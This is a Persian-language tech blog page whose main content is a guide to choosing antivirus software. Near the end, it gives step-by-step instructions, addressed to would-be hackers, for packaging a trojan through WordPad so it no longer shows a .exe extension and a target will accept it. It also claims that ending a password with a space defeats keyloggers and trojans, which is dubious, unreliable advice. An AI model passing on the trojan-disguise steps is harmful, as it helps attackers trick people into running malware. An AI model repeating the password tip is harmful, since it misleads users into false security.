اما بعضي از ويروسهاي ديگر نيز هستند كه بر روي فايل ميزبان چيزي مينويسند يا اينكه اصلاً كدويروس را درون فايل ميزبان قرار ميدهند. يكي از انواع اين ويروسها Loveletter است. در اين مورد به وضوح ديده ميشود كه فايل ميزبان قابل بازيابي نيست و تنها راهحل اين است كه اين فايل را پاك كنيم.
دسته ديگري از ويروسها وجود دارند (مانند ويروس Nimda) كه علاوه بر ايجاد تغييرات بر روي فايل، قابليت دستكاري فايلهاي سيستم و رجيستري را نيز دارند. در اين موارد ضدويروس به تنهايي نميتواند كاري بكند. شما به ابزاري نياز داريد كه بتواند فايل ويروسي را حذف كند و تغييرات اعمال شده در سيستم شما را به حالت اوليه برگرداند. معمولاً اين ابزار كمكي بر روي وب سايتهاي فروشندگان نرمافزار ضدويروس موجود ميباشد.
معيارهاي انتخاب يك ضدويروس
حالا كه متوجه شديد ضدويروس چگونه كار ميكند و چه كارهايي را ميتواند براي شما انجام دهد، وقت آن است ببينيم چه معيارهايي براي انتخاب يك ضدويروس مهم هستند.
1- شناسايي
مهمترين وظيفه يك ضدويروس شناسايي ويروسها است. اما چگونه بايد مطمئن شويم كه يك ضدويروس همان كاري را كه ادعا ميكند انجام ميدهد؟
آيا همين قدر كه برنامه ضدويروس يك گزارش مبني بر شناسايي ويروسها توليد ميكند متقاعد ميشويد كه كار خود را به خوبي انجام ميدهد؟ پيدا كردن جواب دو سوال زير ميتواند به شما كمك كند:
پرسش اول: نرمافزار ضدويروس قادر است چه تعداد ويروس را مورد شناسايي قرار دهد. از اين پارامتر عموماً با نام detection Rate ياد ميشود.
پرسش دوم: نرمافزار ضدويروس تحت چه شرايطي ميتواند يك ويروس را شناسايي كند؟ آيا اگر اين ويروس در حافظه مقيم شده باشد توسط ضدويروس قابل تشخيص است؟
توصيه هاي مهم
اول: يك راهحل اين است كه شما خودتان ضدويروس را بررسي كنيد. براي اين كار بر روي اينترنت به دنبال ويروسهاي مختلفي بگرديد و اين ويروسها را به سيستم خودتان بياوريد و ببينيد كه آيا ضدويروس ميتواند اين ويروسها را شناسايي كند يا نه؟ ولي من شما را از انجام اين عمل شديداً منع ميكنم. حتي اگر فروشنده ضدويروس خودش اين پيشنهاد را به عنوان يك راهحل براي آزمايش ضدويروس داده باشد. همانطورEicar كه گفته است: استفاده از ويروسهاي واقعي براي تست كردن يك ضدويروس در يك محيط عملياتي مانند اين است كه شما آتش را به دفتر كار خود بياوريد و بعد بخواهيد بررسي كنيد كه آيا حسگرهاي دود به خوبي كار ميكنند يا نه؟ شما هرگز نميتوانيد از نتيجه كار مطمئن باشيد. ممكن است برنامه ضدويروس نتواند همه موارد را شناسايي كند و ويروسها شروع به پاك كردن دادههاي ارزشمند سيستم شما و پخش شدن در شبكه بنمايند. امري كه ممكن است به بهاي از دست دادن شغلتان تمام شود.
دوم: اگر شما واقعاً ميخواهيد مطمئن شويد كه يك ضدويروس قادر به انجام چه كارهايي است ميتوانيد در سايتwww.eicar.org يك سري آزمايشهاي بيخطر جهت آزمايش ضدويروس پيدا كنيد. در اين سايت فايلهاي آزمايشي و بيخطري وجود دارند كه بيشتر ضدويروسها آنها را به عنوان ويروس شناسايي ميكنند.
در اين حالت اگر ضدويروس موفق به از بينبردن ويروس شود چه بهتر و چنانچه نتواند، شما هيچگونه اطلاعاتي از دست نخواهيد داد. بدينترتيب ميتوانيد يك روش امن براي آزمايش ضدويروس به كار ببنديد.
سوم: شما ميتوانيد از منابع موجود كه قبلاً اين كار را انجام دادهاند استفاده كنيد. بعضي از سازمانها، متولي انجام همين فعاليت ميباشند. ليستي از ويروسها توسط www.wildlist.org نگهداري ميشود. در اين سايت ميتوانيد ببينيد كه detection Rate يا نرخ شناسايي هر ضدويروس چقدر است.
اين سايتها نيز براي اين منظور مفيد ميباشند:
www.virusbtn.com: اين سايت، آماري از توان ضدويروسها براي شناسايي ويروسهاي موجود در سايت wildlist (در دو مورد on-demand,Real-time) را ارايه ميكند.
www.chech-mark.com/cgi-bin/Redirect.pl: در اين سايت ضدويروسها در دو سطح مورد بررسي قرار ميگيرند. سطح اول همان است كه در سايت Virusbtn نيز انجام ميشود يعني فقط شناسايي ويروسها.
نرمافزارهايي در سطح دوم موفق هستند كه قادر به از بين بردن ويروس نيز باشند.
2- امكانات
بسيار مهم است كه بدانيم چه نوع فناوري در ضدويروس موردنظر استفاده شده است و چه ويژگيهايي دارد.
1- سازگاري سختافزاري و نرمافزاري سيستم شما با ضدويروس انتخاب شده.
در نگاه اول شايد اين مساله كمي بديهي به نظر برسد. اما به هر حال برخي از فروشندگان آخرين نسخه نرمافزار ضدويروس خود را كه تنها با جديدترين سيستمعاملها كار ميكنند، ارايه ميدهند.
بنابراين منطقي به نظر ميرسد كه قبل از اقدام به خريد نرمافزار حتماً به اين نكته توجه كنيد.
2- توانايي پويش(on-Access Real time) را داشته باشد.
اين يكي از ويژگيهاي اساسي است كه يك ضدويروس بايد دارا باشد. اين بخش نرمافزار باعث ميشود كه نرمافزار ضدويروس مانند يك سگ نگهبان عمل كند. يعني همان موقع كه ويروس در حافظه بارگذاري ميشود ويروس را شناسايي و خنثي كند.
اين بخش نرمافزار بايد قادر باشد كه به تمام نواحي سيستم از جمله فايل سيستم، بوت ركورد،
Mabter Boot Record) MBR) و حافظه سركشي كند.
3- توانايي پويش به صورت on-demand را داشته باشد. يكي از كارهاي ضروري كه براي حفظ سلامت سيستمتان بايد انجام دهيد اين است كه هرازچندگاهي وضعيت سيستم خود را با اجراي ضدويروس بررسي كنيد.
مخصوصاً هنگامي كه آخرين نسخه ضدويروس را دريافت ميكنيد حتماً اين كار را انجام دهيد. سناريوي زير انجام توصيه بالا را توجيه ميكند.
شما يك e-mail دريافت ميكنيد كه اين e-mail شامل يك ضميمه و ويروسي است. منتهي شما اين ضميمه را هيچگاه باز نكردهايد. اجراي ضدويروس بروز شده باعث ميشود كه (احتمالاً) ويروس فوق شناسايي شود.
4- از الگوريتمهاي Heuristic پشتيباني كند.
5- بتواند انواع فايلها با فرمتهاي مختلف را پويش كند.
اگر شما ويروسي در سيستم داشته باشيد كه قادر باشد به هر نوع فايلي بچسبد، نياز به ضدويروسي داريد كه بتواند فايلهاي مختلف با پسوندهاي مختلف را مورد بررسي قرار دهد. قبلاً تنها راه انتشار يك ويروس اين بود كه به فايلهاي برنامهاي بچسبد، اما امروزه اين امكان وجود دارد كه ويروس براي انتشار خودش از فايلهاي غيراجرايي نيز استفاه كند.
6- توانايي جلوگيري از فعاليت اسكريپتهاي مخرب را داشته باشد. بعضي از ويروسها هستند كه با استفاده از اسكريپتها طراحي شدهاند. كرمهاي I Love You از اين نوع است.
موتور ضدويروس بايد اين قابليت را داشته باشد كه كدهاي VBS و JS را شناسايي كند و در صورتي كه آنها را مخرب تشيخص دهد از فعاليتشان جلوگيري كند.
7- توانايي بررسي ضميمه e-mail را داشته باشد.
امروزه بسياري از ويروسها توسط e-mail انتشار پيدا ميكنند.
بعضي از آنها مانند كرم KAK حتي اين توانايي را دارند تا در سيستمهايي كه خوب پيكربندي نشدهاند، بدون اينكه ضميمه e-mail باز شود شروع به انتشار خود بنمايند.
8- قابليت بررسي فايلهاي فشرده را نيز داشته باشد. اگر چه يك ويروس هنگامي كه در يك فايل فشرده قرار دارد نميتواند آسيبي به سيستم برساند ولي بهتر است است كه اصلاً اين ويروس در سيستم شما وجود نداشته باشد.
9- قابليت اين را داشته باشد كه اسبهاي تراوا، جاوااپلتهاي مخرب و اكتيوايكسهاي مزاحم را شناسايي كند. نرمافزارهاي ضدويروس نه تنها بايد اين قابليت را داشته باشند كه ويروسها و كرمها را شناسايي كنند بلكه بايد بتوانند از فعاليتاسبهاي تراوا، اكتيويكسها و اپلتهاي جاوا نيز جلوگيري كنند.
امروزه بيشتر ضدويروسها داراي اين خصوصيت ميباشند.
3- نگهداري از نرمافزار
دو مورد زير در نگهداري از نرمافزارهاي ضدويروس قابل توجه هستند.
1- بروز كردن مداوم ضدويروس براي مقابله با ويروسهاي جديد.
در بخشهاي قبل لزوم بروز نگهداشتن بانكاطلاعاتي ضدويروس توضيح داده شد. بنابراين ضدويروس منتخب شما بايد به گونهاي باشد كه به راحتي قابليت روزآمد شدن را داشته باشد و علاوهبرآن بهطور مداوم ركوردهاي اين بانك اطلاعاتي زياد شود. شما همچنين بايد متوجه اين مطلب باشيد كه از چه مكانيزمهايي جهت بروز نگهداشتن ضدويروس استفاده ميشود. آيا نسخههاي بروز شده بر روي وب سايت فروشندگان قرار دارد؟ و آيا به راحتي قابل دريافت ميباشد؟ و آيا شما به راحتي ميتوانيد از وجود يك ويروس جديد آگاهي يابيد يا نه؟
اگر شما داراي ارتباط اينترنتي كم سرعتي باشيد دريافت كردن اين نرمافزار بسيار خستهكننده ميباشد. اين نكته نيز مهم است كه در هر بار انجام اين عمل بايد فقط قسمت روزآمد شده نرمافزار دريافت شود.
نكته ديگر اينكه، نويسندگان ضدويروسها چقدر سعي ميكنند تا روشهاي جديدي كه براي توليد ويروسها استفاده ميشود بشناسند و در نرمافزار خود به كار گيرند؟
و نكته مهمتر اينكه از زمان خبر انتشار يك ويروس تا وقتي كه نرمافزار ضدويروس براي اين ويروس بروز شود چقدر طول ميكشد؟
4- نرمافزارهاي ضدويروس چقدر بر كارايي سيستم شما تأثيرگذار ميباشند؟
همه نرمافزارهاي ضدويروس بر كارايي سيستم شما تأثير ميگذارند. اغلب اوقات اندازهگيري ميزان اين تأثير سخت است ولي به هر حال به عنوان يك معيار مهم در انتخاب ضدويروس مطرح ميباشد. پرسشهاي زير در اين مقوله مهم ميباشند.
- آيا نرمافزار ضدويروس باعث كندتر شدن پروسه بوت سيستم شده است؟
- زمان دسترسي به يك فايل را افزايش داده است؟
پس براي انتخاب يك ضدويروس مناسب ناچاريد كه چند آزمايش را انجام دهيد.
مثلاً ميتوانيد زماني كه براي پويشهاي مختلف (تحت شرايط مختلف) توسط يك ضدويروس مصرف ميشود را محاسبه كنيد و در اين مدت، زمان ميانگين استفاده از حافظه و cpu را نيز اندازهگيري كنيد.
يا اينكه زماني كه براي اسكن on-demand نياز ميباشد را براي محصولات مختلف اندازهگيري كنيد.
يا اينكه وقتي كه ضدويروس در حال پويشReal-time ميباشد ببينيد كه باز كردن يك فايل بزرگ چقدر طول ميكشد؟
توجه به اين موضوع كه محيط تست براي همه ضدويروسها كه مورد ارزيابي قرار ميگيرند، مشابه باشد بسيار مهم است از جلمه اينكه:
حجم فايلها و نوع فايلهايي كه براي هر يك از ضدويروسها مورد بررسي قرار ميگيرد مهم است.
هر دو ضدويروس به يك ترتيب و روي يك سختافزار پيكربندي شده باشند.
5- نرمافزار ضدويروس قابل كنترل باشد.
اگر شما نتوانيد بر روي ضدويروس خود نظارت كامل داشته باشيد مانند اين است كه ضدويروس نداريد.
شما بايد بتوانيد بهطور مرتب (هر زمان كه نياز داشتيد) و بدون زحمت زيادي بانك اطلاعاتي خود را كاملتر يا بروز كنيد.
به راحتي بتوانيد از سرورها خود و كلاينتهاي خود محافظت كنيد و گزارشهاي نرمافزار ضدويروس را براي هر كدام از آنها ببينيد.
6- پشتيباني ضدويروس هميشگي و موثر باشد.
فروشنده نرمافزار بايد قادر باشد كه پشتيباني مورد نظر شما را انجام دهد. مطمئناً پشتيباني كه براي كاربر در خانه ارايه ميشود با پشتيباني كه براي يك شركت بزرگ انجام ميشود با يكديگر متفاوت هستند.
فروشنده براي پشتيباني ميتواند خدمات زير را به شما ارايه دهد.
1- قادر باشد كه شما را به صورت on-line پشتيباني كند و اگر شك كرديد كه فايلي حاوي ويروس است، بتوانيد آن را براي فروشنده ارسال كنيد تا نظر خودش را راجعبه فايل بيان كند.
اگر يك ويروس جديد شناخته شود، فروشنده بايد بتواند اين موضوع را به اطلاع شما برساند تا اقدامات لازم را براي خودتان، يا براي شبكهاي كه شما مس‡وول آن هستيد انجام دهيد.
نتيجهگيري
هيچكدام از نرمافزارهاي ضدويروس بهترين نيستند. يك ضدويروس وقتي براي شما بهترين است كه بتواند نسبت به نرمافزارهاي ديگر به صورت كاملتري نيازهاي شما را برآورده كند.
اطلاعاتي كه فروشنده نرمافزار ارايه ميكند هميشه خوب است ولي انتخاب ضدويروس نبايد تنها براساس ادعاهاي فروشنده باشد.
آنتی ویروسها جادو نمیکنند!
آنتی ویروسها محافظان سیستم های ما هستند. این گونه نرم افزارها میتوانند بنا به ساختمان برنامه ای خود, کنترل مرکزی سیستم را در دست گیرند و مواظب رفتار مشکوک یا برنامه های مخرب اجرایی بر روی سیستم ما باشند ولی با گسترش روابط, نمیتوانیم به صورت کامل روی آنها حساب کنیم زیرا این برنامه ها از حمله ویروسها در امان نیستند .
در بعضی موارد دیده شده که ویروسها بروی سیستم اجرا میشوند ولی آنتی ویروس هیچ واکنشی در مقابل ویروس ندارند و مانند یک برنامه طبیعی با آنها برخورد میکند.
خوشبختانه شرکت های آنتی ویروس برای تسلط بر کل ارتباطات اینترنتی اقدام به تاسیس شرکتهایی به صورت نمایندگی در اکثر کشورها کرده اند. آنها به این منظور نشان دادند که می خواهند کرم ها را در نطفه خفه کنند و از پخش گسترده انها در کل شبکه جلوگیری نمایند.
آنها اقدام به آگاه سازی کاربران اینترنتی از طریق سرویسهایی مانند رادار کرده اند. شاید نقاط ضعف شرکت های آنتی با ارائه این نوع سیستمها به کاربران اثبات شده باشد. انها بر این عقیده اند که به تنهایی و بدون کمک کاربران اینترنتی نمی توانند از پس کرم های اینترنتی برآیند. بنابر این هر شرکت آنتی ویروس آنالیز های خود را در اختیار کاربران قرار میدهد تا اگر نرم افزار آن شرکت نتوانست کرم را خنثی کند کاربران با داشتن اطلاعات کافی شروع به مقابله با کرمها کنند. همان طور که می دانید آنتی ویروس ها فقط یک نرم افزار هستند و ما نمی توانیم تصور کنیم که آنها میتوانند معجزه کنند, باید درک کرد که این نرم افزارها خود دارای مشکل هایی می باشند.
چند تکنیک آنتی ویروس Kaspersky : (از بهترین آنتی ویروسها )
1. تکنیک تله گذاری: در این روش آنتی ویروس توجه ویروس را به خود جلب می کند.
2. مخفی ماندن : وقتی ما آنتی ویروسی در کامپیوتر نصب میکنیم ویروسها در بین فایلها پنهان می شوند. در آنتی ویروس Kaspersky هیچ قسمتی از سیستم (نرم افزاری) متوجه نصب نمی شوند.
3. سیستم رادار : اطلاع رسانی به کاربران.
و ده ها تکنیک دیگر.
تمامی کسانی که در هک اندکی نیز سر رشته دارند مطمئنأ میدانند وقتی یک تروجان ساخته میشود پسوند آن exe. است. این موضوع میتواند باعث شود که فرد مورد نظر تروجان را دریافت نکند. اکنون قصد داریم یک ترفند بسیار جالب را به شما معرفی کنیم که با استفاده از آن میتوانید این پسوند را کاملا محو سازید ، به نوعی که همچنان همان کارایی را داشته باشد.
بدین منظور:
از منوی Start و سپس All Programs وارد Accessories شده و Wordpad را انتخاب کنید.
پس از باز شدن برنامه Wordpad تروجان مورد نظر را Copy کرده و در درون Paste ، Wordpad نمایید.
حال از منوی بالا وارد Edit>Package Object>Edit Package شوید.
در پنجره باز شده از منوی Edit بر روی Copy Package کلیک کنید.
در پایان وارد یکی از درایو های کامپیوتر شده و راست کلیک کنید و Paste را انتخاب کنید.
فایلی که Paste میشود تروجان جدید شما بدون پسوند exe است.
قصد دارم يك روش جالب و در عين حال ساده را به شما معرفي كنيم كه با بهره گيري از آن ميتوانيد پسورد ياهو مسنجر و همين طور ساير رمزهاي عبور خود را از دست هكرها در امان بداريد. با اين ترفند كار بسياري از تروجان ها و برنامه هاي جاسوسي صفحه كليد را دچار اختلال خواهيد كرد.
در الگوريتم بسياري از نرم افزارهاي جاسوسي صفحه كليد (KeyLoger)و تروجان ها ، كليد Space در انتهاي پسورد در نظر گرفته نشده است.
از همين طريق ميتوان اين ترفند را صورت داد:
كافي است در پسوردي كه براي خود ايجاد ميكنيد در پايان آن يك Space بزنيد و يك فاصله ايجاد كنيد. به همين راحت كار بسياري از نرم افزارهاي دشمن را دچار اختلال كرده ايد.
دقت كنيد از اين به بعد بايد هنگام وارد كردن پسورد ، Space را هم در پايان پسورد بزنيد.
به عنوان مثال براي رمز عبور blogfa كافي است آن را به صورت [blogfa[space ثبت كنيم.
هنگامي كه پسورد شما هك ميشود ديگر Space براي هكر نشان داده نميشود و او پسورد را به همان شكل blogfa ميبيند.
ویندوز XP نیز برای راحتی حال کاربران خود یک سیستم مقابله با ویروس ها و هکرها را در درون خود گنجانده است. این ترفند که بیشتر به کار افراد نیمه مبتدی می آید میتواند با استفاده از این قابلیت از ویندوز شما حفاظت کند.
برای فعال سازی آن:
1- از منوي Start، به Contrl Panel بروید.
2- بر روي Network and Internet Connections کليک کنيد.
3- سپس Network Connections را انتخاب کنيد.
4- حال بر روي اتصال اينترنت خود، کليک راست کرده و از منوي باز شده Properties را انتخاب کنيد.
5- از Tab, Advanced گزينه ي Internet Connection Firewall را فعال کنيد.
6- بر روي OK کليک کنيد.
آبان 1387
مهر 1387
شهریور 1387
مرداد 1387
تیر 1387
خرداد 1387
اردیبهشت 1387
فروردین 1387
اسفند 1386
بهمن 1386
آذر 1386
آبان 1386
مهر 1386
شهریور 1386
مرداد 1386
تیر 1386
خرداد 1386
اردیبهشت 1386
فروردین 1386
اسفند 1385
بهمن 1385
دی 1385
آذر 1385
آبان 1385
مهر 1385
شهریور 1385
مرداد 1385
تیر 1385
خرداد 1385
اردیبهشت 1385
ترفند سخت افزار
آموزش اینترنت
آموزش فلش
آموزش فتوشاپ
دانلود نرم افزار
ترفند رجیستری
ترفند ویندوز
ترفند CMD
ترفند موبایل
ترفند امنیت
ترفند یاهو
ترفند بازی
ترفند لینوکس
ترفند ویندوز Xp
ترفند آفیس
ترفند نرم افزار
ترفند اینترنت
تازه های کامپیوتری
کتاب اینترنتی
دانلود موزیک
برنامه موبایل
بازی موبایل
تم موبایل
اخبار موبایل
ترفند ماهواره و رسیور
آموزش و ترفند دلفی
برنامه های خانواده C
عکس و زندگینامه خوانندگان
عکس و زندگینامه بازیگران
عکس و زندگینامه ورزشکاران
عکس زندگینامه سیاستمداران
عکس و زندگینامه مشاهیر
ایران شناسی
جهان شناسی
پزشکی سلامت
اختر شناسی
آشپزی و خانه داری
ریاضی فیزیک
ادبیات فارسی
ادیان الهی
گوشی موبایل
خــودرو
ورزشی
اس ام اس
مکتب های سیاسی
بازی های رایانه ای
-:- جملات زیبا -:-
دنیای موسیقی
طراحی و نقاشی
دنیای سینما
عکس هنری
عکس جالب
امکانات
